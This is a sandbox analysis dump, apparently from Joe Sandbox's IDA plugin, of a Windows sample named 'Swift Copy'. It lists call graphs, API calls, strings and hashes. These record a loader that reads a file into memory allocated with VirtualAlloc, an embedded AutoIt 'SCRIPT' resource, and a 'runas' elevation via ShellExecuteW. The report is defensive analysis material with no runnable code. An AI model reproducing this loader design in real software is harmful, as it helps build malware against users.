97407 de0944 CreateThread 97364->97407 97366 db24aa CloseHandle 97366->97357 97367->97330 97408 d713f1 97368->97408 97371 d713f1 22 API calls 97372 d713d0 97371->97372 97373 d7a961 22 API calls 97372->97373 97374 d713dc 97373->97374 97375 d76b57 22 API calls 97374->97375 97376 d71129 97375->97376 97377 d71bc3 6 API calls 97376->97377 97377->97335 97379 d7a961 22 API calls 97378->97379 97380 d7172c 97379->97380 97381 d7a961 22 API calls 97380->97381 97382 d71734 97381->97382 97383 d7a961 22 API calls 97382->97383 97384 d7174f 97383->97384 97385 d8fddb 22 API calls 97384->97385 97386 d7129c 97385->97386 97387 d71b4a 97386->97387 97388 d71b58 97387->97388 97389 d7a961 22 API calls 97388->97389 97390 d71b63 97389->97390 97391 d7a961 22 API calls 97390->97391 97392 d71b6e 97391->97392 97393 d7a961 22 API calls 97392->97393 97394 d71b79 97393->97394 97395 d7a961 22 API calls 97394->97395 97396 d71b84 97395->97396 97397 d8fddb 22 API calls 97396->97397 97398 d71b96 RegisterWindowMessageW 97397->97398 97398->97349 97400 db272d 97399->97400 97401 d71abb 97399->97401 97415 de3209 23 API calls 97400->97415 97403 d8fddb 22 API calls 97401->97403 97405 d71ac3 97403->97405 97404 db2738 97405->97355 97406->97364 97407->97366 97416 de092a 28 API calls 97407->97416 97409 d7a961 22 API calls 97408->97409 97410 d713fc 97409->97410 97411 d7a961 22 API calls 97410->97411 97412 d71404 97411->97412 97413 d7a961 22 API calls 97412->97413 97414 d713c6 97413->97414 97414->97371 97415->97404 97417 d72de3 97418 d72df0 __wsopen_s 97417->97418 97419 db2c2b ___scrt_fastfail 97418->97419 97420 d72e09 97418->97420 97423 db2c47 GetOpenFileNameW 97419->97423 97421 d73aa2 23 API calls 97420->97421 97422 d72e12 97421->97422 97433 d72da5 97422->97433 97424 db2c96 97423->97424 97426 d76b57 22 API calls 97424->97426 97428 db2cab 97426->97428 97428->97428 97430 d72e27 97451 d744a8 97430->97451 97434 db1f50 __wsopen_s 97433->97434 97435 d72db2 GetLongPathNameW 97434->97435 97436 d76b57 22 API calls 97435->97436 97437 d72dda 97436->97437 97438 d73598 97437->97438 97439 d7a961 22 API calls 97438->97439 97440 d735aa 97439->97440 97441 d73aa2 23 API calls 97440->97441 97442 d735b5 97441->97442 97443 db32eb 97442->97443 97444 d735c0 97442->97444 97448 db330d 97443->97448 97487 d8ce60 41 API calls 97443->97487 97446 d7515f 22 API calls 97444->97446 97447 d735cc 97446->97447 97481 d735f3 97447->97481 97450 d735df 97450->97430 97452 d74ecb 94 API calls 97451->97452 97453 d744cd 97452->97453 97454 db3833 97453->97454 97455 d74ecb 94 API calls 97453->97455 97456 de2cf9 80 API calls 97454->97456 97457 d744e1 97455->97457 97458 db3848 97456->97458 97457->97454 97459 d744e9 97457->97459 97460 db3869 97458->97460 97461 db384c 97458->97461 97463 d744f5 97459->97463 97464 db3854 97459->97464 97462 d8fe0b 22 API calls 97460->97462 97465 d74f39 68 API calls 97461->97465 97480 db38ae 97462->97480 97497 d7940c 136 API calls 2 library calls 97463->97497 97498 ddda5a 82 API calls 97464->97498 97465->97464 97468 d72e31 97469 db3862 97469->97460 97470 db3a5f 97475 db3a67 97470->97475 97471 d74f39 68 API calls 97471->97475 97472 d7a4a1 22 API calls 97472->97480 97475->97471 97501 dd989b 82 API calls __wsopen_s 97475->97501 97477 d79cb3 22 API calls 97477->97480 97480->97470 97480->97472 97480->97475 97480->97477 97488 dd967e 97480->97488 97491 d73ff7 97480->97491 97499 dd95ad 42 API calls _wcslen 97480->97499 97500 de0b5a 22 API calls 97480->97500 97483 d73605 97481->97483 97486 d73624 __fread_nolock 97481->97486 97482 d8fddb 22 API calls 97484 d7363b 97482->97484 97485 d8fe0b 22 API calls 97483->97485 97484->97450 97485->97486 97486->97482 97487->97443 97489 d8fe0b 22 API calls 97488->97489 97490 dd96ae __fread_nolock 97489->97490 97490->97480 97492 d7400a 97491->97492 97494 d740ae 97491->97494 97493 d8fe0b 22 API calls 97492->97493 97496 d7403c 97492->97496 97493->97496 97494->97480 97495 d8fddb 22 API calls 97495->97496 97496->97494 97496->97495 97497->97468 97498->97469 97499->97480 97500->97480 97501->97475 97502 da8402 97507 da81be 97502->97507 97505 da842a 97512 da81ef try_get_first_available_module 97507->97512 97509 da83ee 97526 da27ec 26 API calls _strftime 97509->97526 97511 da8343 97511->97505 97519 db0984 97511->97519 97515 da8338 97512->97515 97522 d98e0b 40 API calls 2 library calls 97512->97522 97514 da838c 97514->97515 97523 d98e0b 40 API calls 2 library calls 97514->97523 97515->97511 97525 d9f2d9 20 API calls __dosmaperr 97515->97525 97517 da83ab 97517->97515 97524 d98e0b 40 API calls 2 library calls 97517->97524 97527 db0081 97519->97527 97521 db099f 97521->97505 97522->97514 97523->97517 97524->97515 97525->97509 97526->97511 97530 db008d ___BuildCatchObject 97527->97530 97528 db009b 97584 d9f2d9 20 API calls __dosmaperr 97528->97584 97530->97528 97532 db00d4 97530->97532 97531 db00a0 97585 da27ec 26 API calls _strftime 97531->97585 97538 db065b 97532->97538 97537 db00aa __fread_nolock 97537->97521 97539 db0678 97538->97539 97540 db068d 97539->97540 97541 db06a6 97539->97541 97601 d9f2c6 20 API calls __dosmaperr 97540->97601 97587 da5221 97541->97587 97544 db0692 97602 d9f2d9 20 API calls __dosmaperr 97544->97602 97545 db06ab 97546 db06cb 97545->97546 97547 db06b4 97545->97547 97600 db039a CreateFileW 97546->97600 97603 d9f2c6 20 API calls __dosmaperr 97547->97603 97551 db06b9 97604 d9f2d9 20 API calls __dosmaperr 97551->97604 97552 db0781 GetFileType 97555 db078c GetLastError 97552->97555 97556 db07d3 97552->97556 97554 db0756 GetLastError 97606 d9f2a3 20 API calls __dosmaperr 97554->97606 97607 d9f2a3 20 API calls __dosmaperr 97555->97607 97609 da516a 21 API calls 2 library calls 97556->97609 97557 db0704 97557->97552 97557->97554 97605 db039a CreateFileW 97557->97605 97561 db079a CloseHandle 97561->97544 97564 db07c3 97561->97564 97563 db0749 97563->97552 97563->97554 97608 d9f2d9 20 API calls __dosmaperr 97564->97608 97566 db07f4 97567 db0840 97566->97567 97610 db05ab 72 API calls 3 library calls 97566->97610 97572 db086d 97567->97572 97611 db014d 72 API calls 4 library calls 97567->97611 97568 db07c8 97568->97544 97571 db0866 97571->97572 97573 db087e 97571->97573 97574 da86ae __wsopen_s 29 API calls 97572->97574 97575 db00f8 97573->97575 97576 db08fc CloseHandle 97573->97576 97574->97575 97586 db0121 LeaveCriticalSection __wsopen_s 97575->97586 97612 db039a CreateFileW 97576->97612 97578 db0927 97579 db095d 97578->97579 97580 db0931 GetLastError 97578->97580 97579->97575 97613 d9f2a3 20 API calls __dosmaperr 97580->97613 97582 db093d 97614 da5333 21 API calls 2 library calls 97582->97614 97584->97531 97585->97537 97586->97537 97588 da522d ___BuildCatchObject 97587->97588 97615 da2f5e EnterCriticalSection 97588->97615 97590 da527b 97616 da532a 97590->97616 97592 da5259 97619 da5000 21 API calls 3 library calls 97592->97619 97593 da5234 97593->97590 97593->97592 97597 da52c7 EnterCriticalSection 97593->97597 97594 da52a4 __fread_nolock 97594->97545 97596 da525e 97596->97590 97620 da5147 EnterCriticalSection 97596->97620 97597->97590 97598 da52d4 LeaveCriticalSection 97597->97598 97598->97593 97600->97557 97601->97544 97602->97575 97603->97551 97604->97544 97605->97563 97606->97544 97607->97561 97608->97568 97609->97566 97610->97567 97611->97571 97612->97578 97613->97582 97614->97579 97615->97593 97621 da2fa6 LeaveCriticalSection 97616->97621 97618 da5331 97618->97594 97619->97596 97620->97590 97621->97618 97622 d71cad SystemParametersInfoW 97623 dc2a00 97624 d7d7b0 messages 97623->97624 97625 d7db11 PeekMessageW 97624->97625 97626 d7d807 GetInputState 97624->97626 97627 dc1cbe TranslateAcceleratorW 97624->97627 97629 d7db8f PeekMessageW 97624->97629 97630 d7da04 timeGetTime 97624->97630 97631 d7db73 TranslateMessage DispatchMessageW 97624->97631 97632 d7dbaf Sleep 97624->97632 97633 dc2b74 Sleep 97624->97633 97635 dc1dda timeGetTime 97624->97635 97644 d7d9d5 97624->97644 97651 d7ec40 235 API calls 97624->97651 97652 d81310 235 API calls 97624->97652 97655 d7dd50 97624->97655 97662 d7dfd0 97624->97662 97685 d7bf40 235 API calls 2 library calls 97624->97685 97686 d8edf6 IsDialogMessageW GetClassLongW 97624->97686 97688 de3a2a 23 API calls 97624->97688 97689 de359c 82 API calls __wsopen_s 97624->97689 97625->97624 97626->97624 97626->97625 97627->97624 97629->97624 97630->97624 97631->97629 97649 d7dbc0 97632->97649 97633->97649 97634 d8e551 timeGetTime 97634->97649 97687 d8e300 23 API calls 97635->97687 97638 dc2c0b GetExitCodeProcess 97639 dc2c37 CloseHandle 97638->97639 97640 dc2c21 WaitForSingleObject 97638->97640 97639->97649 97640->97624 97640->97639 97641 dc2a31 97641->97644 97642 e029bf GetForegroundWindow 97642->97649 97645 dc2ca9 Sleep 97645->97624 97649->97624 97649->97634 97649->97638 97649->97641 97649->97642 97649->97644 97649->97645 97690 df5658 23 API calls 97649->97690 97691 dde97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97649->97691 97692 ddd4dc 47 API calls 97649->97692 97651->97624 97652->97624 97656 d7dd83 97655->97656 97657 d7dd6f 97655->97657 97694 de359c 82 API calls __wsopen_s 97656->97694 97693 d7d260 235 API calls 2 library calls 97657->97693 97659 d7dd7a 97659->97624 97661 dc2f75 97661->97661 97663 d7e010 97662->97663 97680 d7e0dc messages 97663->97680 97697 d90242 5 API calls __Init_thread_wait 97663->97697 97666 dc2fca 97668 d7a961 22 API calls 97666->97668 97666->97680 97667 d7a961 22 API calls 97667->97680 97670 dc2fe4 97668->97670 97669 de359c 82 API calls 97669->97680 97698 d900a3 29 API calls __onexit 97670->97698 97674 dc2fee 97699 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97674->97699 97677 d7ec40 235 API calls 97677->97680 97679 d7a8c7 22 API calls 97679->97680 97680->97667 97680->97669 97680->97677 97680->97679 97681 d7e3e1 97680->97681 97682 d804f0 22 API calls 97680->97682 97695 d7a81b 41 API calls 97680->97695 97696 d8a308 235 API calls 97680->97696 97700 d90242 5 API calls __Init_thread_wait 97680->97700 97701 d900a3 29 API calls __onexit 97680->97701 97702 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97680->97702 97703 df47d4 235 API calls 97680->97703 97704 df68c1 235 API calls 97680->97704 97681->97624 97682->97680 97685->97624 97686->97624 97687->97624 97688->97624 97689->97624 97690->97649 97691->97649 97692->97649 97693->97659 97694->97661 97695->97680 97696->97680 97697->97666 97698->97674 97699->97680 97700->97680 97701->97680 97702->97680 97703->97680 97704->97680 97705 ed23b0 97719 ed0000 97705->97719 97707 ed247e 97722 ed22a0 97707->97722 97709 ed24a7 CreateFileW 97711 ed24fb 97709->97711 97712 ed24f6 97709->97712 97711->97712 97713 ed2512 VirtualAlloc 97711->97713 97713->97712 97714 ed2530 ReadFile 97713->97714 97714->97712 97715 ed254b 97714->97715 97716 ed12a0 13 API calls 97715->97716 97717 ed257e 97716->97717 97718 ed25a1 ExitProcess 97717->97718 97718->97712 97725 ed34b0 GetPEB 97719->97725 97721 ed068b 97721->97707 97723 ed22a9 Sleep 97722->97723 97724 ed22b7 97723->97724 97726 ed34da 97725->97726 97726->97721 97727 db2ba5 97728 d72b25 97727->97728 97729 db2baf 97727->97729 97755 d72b83 7 API calls 97728->97755 97731 d73a5a 24 API calls 97729->97731 97733 db2bb8 97731->97733 97735 d79cb3 22 API calls 97733->97735 97737 db2bc6 97735->97737 97736 d72b2f 97738 d72b44 97736->97738 97741 d73837 49 API calls 97736->97741 97739 db2bce 97737->97739 97740 db2bf5 97737->97740 97750 d72b5f 97738->97750 97759 d730f2 Shell_NotifyIconW ___scrt_fastfail 97738->97759 97742 d733c6 22 API calls 97739->97742 97743 d733c6 22 API calls 97740->97743 97741->97738 97744 db2bd9 97742->97744 97753 db2bf1 GetForegroundWindow ShellExecuteW 97743->97753 97746 d76350 22 API calls 97744->97746 97749 db2be7 97746->97749 97747 db2c26 97747->97750 97751 d733c6 22 API calls 97749->97751 97752 d72b66 SetCurrentDirectoryW 97750->97752 97751->97753 97754 d72b7a 97752->97754 97753->97747 97760 d72cd4 7 API calls 97755->97760 97757 d72b2a 97758 d72c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97757->97758 97758->97736 97759->97750 97760->97757

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 234 d742de-d7434d call d7a961 GetVersionExW call d76b57 239 d74353 234->239 240 db3617-db362a 234->240 242 d74355-d74357 239->242 241 db362b-db362f 240->241 243 db3632-db363e 241->243 244 db3631 241->244 245 d7435d-d743bc call d793b2 call d737a0 242->245 246 db3656 242->246 243->241 247 db3640-db3642 243->247 244->243 263 db37df-db37e6 245->263 264 d743c2-d743c4 245->264 250 db365d-db3660 246->250 247->242 249 db3648-db364f 247->249 249->240 252 db3651 249->252 253 d7441b-d74435 GetCurrentProcess IsWow64Process 250->253 254 db3666-db36a8 250->254 252->246 256 d74437 253->256 257 d74494-d7449a 253->257 254->253 258 db36ae-db36b1 254->258 260 d7443d-d74449 256->260 257->260 261 db36db-db36e5 258->261 262 db36b3-db36bd 258->262 270 d7444f-d7445e LoadLibraryA 260->270 271 db3824-db3828 GetSystemInfo 260->271 266 db36f8-db3702 261->266 267 db36e7-db36f3 261->267 272 db36ca-db36d6 262->272 273 db36bf-db36c5 262->273 268 db37e8 263->268 269 db3806-db3809 263->269 264->250 265 d743ca-d743dd 264->265 274 d743e3-d743e5 265->274 275 db3726-db372f 265->275 277 db3715-db3721 266->277 278 db3704-db3710 266->278 267->253 276 db37ee 268->276 279 db380b-db381a 269->279 280 db37f4-db37fc 269->280 281 d74460-d7446e GetProcAddress 270->281 282 d7449c-d744a6 GetSystemInfo 270->282 272->253 273->253 284 db374d-db3762 274->284 285 d743eb-d743ee 274->285 286 db373c-db3748 275->286 287 db3731-db3737 275->287 276->280 277->253 278->253 279->276 288 db381c-db3822 279->288 280->269 281->282 289 d74470-d74474 GetNativeSystemInfo 281->289 283 d74476-d74478 282->283 294 d74481-d74493 283->294 295 d7447a-d7447b FreeLibrary 283->295 292 db376f-db377b 284->292 293 db3764-db376a 284->293 290 d743f4-d7440f 285->290 291 db3791-db3794 285->291 286->253 287->253 288->280 289->283 296 d74415 290->296 297 db3780-db378c 290->297 291->253 298 db379a-db37c1 291->298 292->253 293->253 295->294 296->253 297->253 299 db37ce-db37da 298->299 300 db37c3-db37c9 298->300 299->253 300->253
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00D7430D
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • GetCurrentProcess.KERNEL32(?,00E0CB64,00000000,?,?), ref: 00D74422
                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D74429
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D74454
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D74466
                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D74474
                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D7447B
                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00D744A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                              • API String ID: 3290436268-3101561225
                                              • Opcode ID: 8ebfadafd8d5a166f746133f7c840a74f05cc2136f93c542893eeb1716688935
                                              • Instruction ID: 6d10d0e06d4cd12f24074525b4585b0244b26fb976591d7e58e95f2714744090
                                              • Opcode Fuzzy Hash: 8ebfadafd8d5a166f746133f7c840a74f05cc2136f93c542893eeb1716688935
                                              • Instruction Fuzzy Hash: E8A1966A90A2C0DFCF12CF6B7C411E57FA46B27744B1A94E9D085B3A22E76045CEDB31

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1378 d742a2-d742ba CreateStreamOnHGlobal 1379 d742bc-d742d3 FindResourceExW 1378->1379 1380 d742da-d742dd 1378->1380 1381 db35ba-db35c9 LoadResource 1379->1381 1382 d742d9 1379->1382 1381->1382 1383 db35cf-db35dd SizeofResource 1381->1383 1382->1380 1383->1382 1384 db35e3-db35ee LockResource 1383->1384 1384->1382 1385 db35f4-db3612 1384->1385 1385->1382
                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D750AA,?,?,00000000,00000000), ref: 00D742B2
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D750AA,?,?,00000000,00000000), ref: 00D742C9
                                              • LoadResource.KERNEL32(?,00000000,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20), ref: 00DB35BE
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20), ref: 00DB35D3
                                              • LockResource.KERNEL32(00D750AA,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20,?), ref: 00DB35E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: 42e1084941dc9b9cedefa977a81c700e8e6940d234c0a3ca3434c278eacd1a3a
                                              • Instruction ID: 2505c596862f7a8c5e0e53f57648fc17072a42c15d2d034f585704b99924cff2
                                              • Opcode Fuzzy Hash: 42e1084941dc9b9cedefa977a81c700e8e6940d234c0a3ca3434c278eacd1a3a
                                              • Instruction Fuzzy Hash: B1118E70201701BFD7228B66DC48F677BBDEBC5B51F248269F406E66A0EB72DC548A30

                                              Control-flow Graph

                                              APIs
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D72B6B
                                                • Part of subcall function 00D73A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D72E7F,?,?,?,00000000), ref: 00D73A78
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • GetForegroundWindow.USER32(runas,?,?,?,?,?,00E32224), ref: 00DB2C10
                                              • ShellExecuteW.SHELL32(00000000,?,?,00E32224), ref: 00DB2C17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                              • String ID: runas
                                              • API String ID: 448630720-4000483414
                                              • Opcode ID: 7d840653cd12612a961b24ada2f45a383de6e1befe9cbfcd28d4b67c11f6f05c
                                              • Instruction ID: fc0555b241ac7b9720740779ff3ad4963f7c80ddb948475ad347426900266044
                                              • Opcode Fuzzy Hash: 7d840653cd12612a961b24ada2f45a383de6e1befe9cbfcd28d4b67c11f6f05c
                                              • Instruction Fuzzy Hash: 8C11B7321043455ACB14FF64D8569BEBBA4DBD5300F08941DF19A220A2FF31994AD732
                                              APIs
                                              • lstrlenW.KERNEL32(?,00DB5222), ref: 00DDDBCE
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DDDBDD
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DDDBEE
                                              • FindClose.KERNEL32(00000000), ref: 00DDDBFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                              • String ID:
                                              • API String ID: 2695905019-0
                                              • Opcode ID: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                              • Instruction ID: 6fc12009332472e60764a62f3464b037a5f8d4416911361c9b4270e3257ff5b5
                                              • Opcode Fuzzy Hash: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                              • Instruction Fuzzy Hash: 1DF0A0308609105BC6206BBCAC0E8BA377D9F05334F244703F876D22F1EBB1999886A5
                                              APIs
                                              • GetInputState.USER32 ref: 00D7D807
                                              • timeGetTime.WINMM ref: 00D7DA07
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB28
                                              • TranslateMessage.USER32(?), ref: 00D7DB7B
                                              • DispatchMessageW.USER32(?), ref: 00D7DB89
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB9F
                                              • Sleep.KERNEL32(0000000A), ref: 00D7DBB1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                              • String ID:
                                              • API String ID: 2189390790-0
                                              • Opcode ID: 3ca8a14fd77560a16807e8645ce6c4912a4e7854bfa7adf55a2a09ba836d8072
                                              • Instruction ID: 46d146281e32820e871faa945fc93dce810f850d6d5bec846eb96818effae6fb
                                              • Opcode Fuzzy Hash: 3ca8a14fd77560a16807e8645ce6c4912a4e7854bfa7adf55a2a09ba836d8072
                                              • Instruction Fuzzy Hash: 1C42BF306082429FD725DF25C844F6AB7B2FF86304F18865DE59997291E771E888CFB2

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00D72D07
                                              • RegisterClassExW.USER32(00000030), ref: 00D72D31
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D72D42
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00D72D5F
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D72D6F
                                              • LoadIconW.USER32(000000A9), ref: 00D72D85
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D72D94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 467a55330b056b5ade76895091f37da60a63c39a35e0835ebba4909e4e1a92f0
                                              • Instruction ID: 30e0d99a3a4f77251cfb8833333ba867be97116e6878fde7a3e8c9b977c07b62
                                              • Opcode Fuzzy Hash: 467a55330b056b5ade76895091f37da60a63c39a35e0835ebba4909e4e1a92f0
                                              • Instruction Fuzzy Hash: 1221E3B5901308AFDF00DFA6E849BDDBBB4FB49700F10825AF611B62A0D7B10589CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
